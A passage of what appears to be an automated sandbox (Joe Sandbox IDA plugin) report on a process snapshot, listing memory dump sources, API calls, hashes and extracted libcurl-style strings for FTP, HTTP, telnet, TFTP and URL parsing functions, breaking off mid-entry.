                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _cwprintf_s_lfree
                                      • String ID: ABOR$Failure sending ABOR command: %s$No data was received!$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                      • API String ID: 52267941-2312071747
                                      • Opcode ID: af486cb4fd75f6543c0f10e2d137d75b8a9d679ca92db0817cda33cde9a9a59c
                                      • Instruction ID: 27cefa5266e6d3e950d295c724e981c6d3bdff758612deefa4c0fcbaa7ce903f
                                      • Opcode Fuzzy Hash: af486cb4fd75f6543c0f10e2d137d75b8a9d679ca92db0817cda33cde9a9a59c
                                      • Instruction Fuzzy Hash: 54D18451A0CFC245FB65EB25E4103B9EA90AF49764F884235CA7E076D1CE6CE54CF3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isspace
                                      • String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$,$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$chunked$deflate$gzip$identity$x-gzip
                                      • API String ID: 3785662208-25230839
                                      • Opcode ID: 91a0a15b42e59837f7cda72a9521f443044f5965f9416a7cba8fa7c7546208b5
                                      • Instruction ID: 41515b50c324e735face36927a3a542abbdec06849a679e3b7ae5472546c2327
                                      • Opcode Fuzzy Hash: 91a0a15b42e59837f7cda72a9521f443044f5965f9416a7cba8fa7c7546208b5
                                      • Instruction Fuzzy Hash: 43C19132A0868A86EB64AB24D5407B9F790FF09780F944135C76D832D1DF3CE459E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$isspace
                                      • String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Connection:$Content-Length:$HTTP 1.0, assume close after body$HTTP/1.0 connection set to keep alive!$HTTP/1.0 proxy connection set to keep alive!$HTTP/1.1 proxy connection set close!$Lying server, not serving HTTP/2$Proxy-Connection:$close$keep-alive
                                      • API String ID: 556700956-3121621470
                                      • Opcode ID: 82ec5805037d26ee7592c6b41ce6d7fd1c23136c292204410feed31d9a497e4e
                                      • Instruction ID: f460fc690279be115a13ee46090cb54f65195050b7359f58657b008c3a2d7711
                                      • Opcode Fuzzy Hash: 82ec5805037d26ee7592c6b41ce6d7fd1c23136c292204410feed31d9a497e4e
                                      • Instruction Fuzzy Hash: 9AD19331A08B8A96EB64EB24D5406B9F7A0FF09750F844132C66D832D5DF3CE459E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strncpy$__stdio_common_vsscanf__swprintf_latoifree
                                      • String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
                                      • API String ID: 3073542286-748038847
                                      • Opcode ID: 8acb15c5c82fbc97157259be6f5b3fd1976768a32f4e92d5c1cea61d6e55a0a2
                                      • Instruction ID: e73d3163d147d351fc5bbf933f70604de96fc503e4a1e6185f96ef309ca4063b
                                      • Opcode Fuzzy Hash: 8acb15c5c82fbc97157259be6f5b3fd1976768a32f4e92d5c1cea61d6e55a0a2
                                      • Instruction Fuzzy Hash: FD817D22A18A86A1FB14EF21D9446E9E360FF4D788FC40032DA6D472D5DF3CE519E3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func__swprintf_lfputsstrchr$_getchrealloc
                                      • String ID: ;$Enter %s password for user '%s' on URL #%I64u:$Enter %s password for user '%s':
                                      • API String ID: 1528618394-757488312
                                      • Opcode ID: 931e3b161f37cd3dfbb5602e6aba708a8714cc9cb027de7268539cd7d6ed9be6
                                      • Instruction ID: 70928682973f9a96343555dcef1f35ca8d64639fee1ce7af7bbac6d5e1a4e0df
                                      • Opcode Fuzzy Hash: 931e3b161f37cd3dfbb5602e6aba708a8714cc9cb027de7268539cd7d6ed9be6
                                      • Instruction Fuzzy Hash: 9051B32260D68255EB21AB11E4443FAE7A0AF4C784F880135DEBE073D9DF3CD559D7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: f25421f54573a157d687ac2f20d382b369c2b34ce666d32837747bbf85741083
                                      • Instruction ID: 4739d728f9e728ecfd0fe7247ead0301d1d7a842e20f7c67fd2ab62d96fbf242
                                      • Opcode Fuzzy Hash: f25421f54573a157d687ac2f20d382b369c2b34ce666d32837747bbf85741083
                                      • Instruction Fuzzy Hash: 3CA16F36609A86D6D759AF31F9602A9F364FB9CB80F884135CBAE43351CF3CE0689754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$__stdio_common_vsscanfstrchr
                                      • String ID: %c%c%c%u%c$%d,%d,%d,%d,%d,%d$%d.%d.%d.%d$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %d.%d.%d.%d for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                      • API String ID: 551833581-430170857
                                      • Opcode ID: e36794e94d7dfbf1cdcfab1069ef77bf2f41708d74add39ea8d1ef33a03e04b1
                                      • Instruction ID: 4765f3d353c7b38f14ac886ed045c27f54a11e2c357449ace51d437474cbf927
                                      • Opcode Fuzzy Hash: e36794e94d7dfbf1cdcfab1069ef77bf2f41708d74add39ea8d1ef33a03e04b1
                                      • Instruction Fuzzy Hash: B3D19425A0CA8692EB18EB21E9402B9E760FF4D784F840032DA6D077D5DF3CE569F794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D30FD4
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31015
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31037
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D31049
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31069
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D31083
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D310A6
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00007FF7F8D311D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: freestrncmp$mallocstrchr
                                      • String ID: ../$/..$/../$/./
                                      • API String ID: 52199485-456519384
                                      • Opcode ID: 81cf380c42f6a9c7741149d5f89adb35764e81b9d653370f2f332759046074bd
                                      • Instruction ID: 2d5cd31299502f45f003308b4b786b90d3ba5661271ae79230d3b5f7a203f84d
                                      • Opcode Fuzzy Hash: 81cf380c42f6a9c7741149d5f89adb35764e81b9d653370f2f332759046074bd
                                      • Instruction Fuzzy Hash: ED717011A0D58744FF126B21E9103B8DB956F29B90FC84171DABD463D1DE2CA44AF3B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$__stdio_common_vsscanf__swprintf_lfreeinet_ptonstrtol
                                      • String ID: %s://%s%s%s:%hu%s%s%s$;type=%c$IPv6 numerical address used in URL without brackets$Port number ended with '%c'$Port number out of range$[%*45[0123456789abcdefABCDEF:.]%c
                                      • API String ID: 1531573046-2409472992
                                      • Opcode ID: c7bcae011e34022283afc6b280f93ec16f7c4577c7b3c33e4fbae35c9be6089f
                                      • Instruction ID: a3cca70aec0fa291188aed6d07219d39ce108ab65187765f3225cabda7e2d382
                                      • Opcode Fuzzy Hash: c7bcae011e34022283afc6b280f93ec16f7c4577c7b3c33e4fbae35c9be6089f
                                      • Instruction Fuzzy Hash: 7381912260CBC185FB20EF35E8502E9FBA0EF49790F944036DAAD477A5DE2CD548D7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,?,?,00000000,?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FA7F
                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00000000,?,?,00000000,?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FAB0
                                      • strchr.LIBVCRUNTIME ref: 00007FF7F8D1FB24
                                      • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D1FB4F
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?,00000000,?,?,00007FF7F8D2078E), ref: 00007FF7F8D1FBBA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: freeisxdigitstrchrstrncmpstrtol
                                      • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                      • API String ID: 4079200914-2404041592
                                      • Opcode ID: 469f0991adbe2d5c7b120f583ab6e8e2235976a9a2f4a52b611c4f65ea0b00d0
                                      • Instruction ID: c7527cc2ae65b40bf95ee8a41bbdd2a0e03d860b0c9719345c0d766006d79f46
                                      • Opcode Fuzzy Hash: 469f0991adbe2d5c7b120f583ab6e8e2235976a9a2f4a52b611c4f65ea0b00d0
                                      • Instruction Fuzzy Hash: 12518451A0DB8244FB11AB32E860378EB90AF5DBA4F8C4031C96D466D5DE7CE44DE3A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$strncpy
                                      • String ID: NO_PROXY$memory shortage$no_proxy
                                      • API String ID: 526250031-2769599289
                                      • Opcode ID: fedc0dd161cbf5462213db2f81213b3f33f7862e5c583ceb5e97a95514a1b97f
                                      • Instruction ID: e0712c242fd56a3f89030e855fad6fc4109ad5ea9c8c6dac1310e56a592ddf84
                                      • Opcode Fuzzy Hash: fedc0dd161cbf5462213db2f81213b3f33f7862e5c583ceb5e97a95514a1b97f
                                      • Instruction Fuzzy Hash: 79A14515B0DEC195FB59AB32B910279D794BF5DB94F880034DE6E07391DF3CA428A3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: isspace
                                      • String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$deflate$gzip$identity$x-gzip
                                      • API String ID: 3785662208-3444300602
                                      • Opcode ID: a3de04446af61df85552f8435f7f04c19453461ced4174aa80fdadbf7d5d3986
                                      • Instruction ID: dd30c383ee341e20ad3a61f17fb11e2b16bded20c962404fb36dc7108e6857a8
                                      • Opcode Fuzzy Hash: a3de04446af61df85552f8435f7f04c19453461ced4174aa80fdadbf7d5d3986
                                      • Instruction Fuzzy Hash: B7C19032A0868A86FB64AB24D5406B9F7A0FF09790F944135C76D832D1DF3CE459E7B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: sendto$ErrorLast$_time64
                                      • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                      • API String ID: 251675022-4197595102
                                      • Opcode ID: 7ce6048a5e3d92de6ace709e8b7e9eafcd073ef33f1777cd89a68624e9e123b3
                                      • Instruction ID: 028e9834f611cbfa05a2dc871f2b75a49403caeaec3b76a8ff6c42a1c96f5fde
                                      • Opcode Fuzzy Hash: 7ce6048a5e3d92de6ace709e8b7e9eafcd073ef33f1777cd89a68624e9e123b3
                                      • Instruction Fuzzy Hash: 9DA19072A08681C2EB11DF39D4406A8B7A0FF88F89F844132DE5D4B798DF39D449E7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • inet_pton.WS2_32 ref: 00007FF7F8D197C1
                                      • inet_pton.WS2_32 ref: 00007FF7F8D197F6
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D19780
                                        • Part of subcall function 00007FF7F8D19168: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF7F8D19212,?,?,?,?,00000000,?,?,00007FF7F8D19449,00000000,?,?,00007FF7F8D1FF56), ref: 00007FF7F8D19185
                                        • Part of subcall function 00007FF7F8D03018: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D03055
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D198A3
                                        • Part of subcall function 00007FF7F8D2E620: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D23498,?,?,?,00007FF7F8D237B6,?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2E64B
                                        • Part of subcall function 00007FF7F8D2E620: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D23498,?,?,?,00007FF7F8D237B6,?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2E661
                                        • Part of subcall function 00007FF7F8D2E620: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D23498,?,?,?,00007FF7F8D237B6,?,?,?,00007FF7F8D1BF55), ref: 00007FF7F8D2E67A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$inet_pton$__stdio_common_vsscanftolower
                                      • String ID: %255[^:]:%d$%255[^:]:%d:%255s$%s:%d$Added %s:%d:%s to DNS cache$Address in '%s' found illegal!$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!
                                      • API String ID: 4215584051-312647877
                                      • Opcode ID: 2af8d53b83bddfcc075963b934ee2a28eaa495eee29905eadc009cf18fa4f31a
                                      • Instruction ID: 898042160acce3f368c206d81ab270de325c40ad7ed188f17b9e9766a31f736a
                                      • Opcode Fuzzy Hash: 2af8d53b83bddfcc075963b934ee2a28eaa495eee29905eadc009cf18fa4f31a
                                      • Instruction Fuzzy Hash: 4A81A121A0DA46A1FB54AB61D4183B9E350FF49BA8FC41132D92D07AC5DF7CE40EE3A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l$_time64
                                      • String ID: %04d%02d%02d %02d:%02d:%02d GMT$%04d%02d%02d%02d%02d%02d$Given file does not exist$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$unsupported MDTM reply format
                                      • API String ID: 2514911627-226030088
                                      • Opcode ID: 4f9e3f73b947e671f8310d557baf93f74143cfabee6b96b52e105c9b33bce88f
                                      • Instruction ID: 9c2001577f30cc214be4b5ac180aef85a592d2aaf452814b60ff4e9f562c0c06
                                      • Opcode Fuzzy Hash: 4f9e3f73b947e671f8310d557baf93f74143cfabee6b96b52e105c9b33bce88f
                                      • Instruction Fuzzy Hash: 9E81A572608B4186FB10DB24E4406AAF3A0FF88754F944132EA6D477D8DF7CE408EB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Connection closure while negotiating auth (HTTP 1.0?)$Content-Length:$HTTP 1.0, assume close after body$HTTP error before end of send, keep sending$Keep sending data to get tossed away!$Lying server, not serving HTTP/2$no chunk, no close, no size. Assume close to signal end
                                      • API String ID: 0-3305901948
                                      • Opcode ID: c5cd187ffcc3af157f39b31296a456bd382633f5083d1299da49dd6485f2859d
                                      • Instruction ID: 5efdc2f91413ea879f1698db4e5df2a18f75408d4e261181fda634c912b4691b
                                      • Opcode Fuzzy Hash: c5cd187ffcc3af157f39b31296a456bd382633f5083d1299da49dd6485f2859d
                                      • Instruction Fuzzy Hash: C7E19172A0868686EB68EB3495407BAF7A0FF09750F804135C779832D1DF3CE459E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: strchr$callocfreereallocstrncmp
                                      • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!$no memory
                                      • API String ID: 425831019-2111548750
                                      • Opcode ID: 80daac59f8ca92fa118a95de044cdb50cbc06663b1a9f6a85e2ee34f832b41aa
                                      • Instruction ID: 07c514185129e1958d017ef9e5da5e71b20dd3cf3a96b8309ec66ca3281de80a
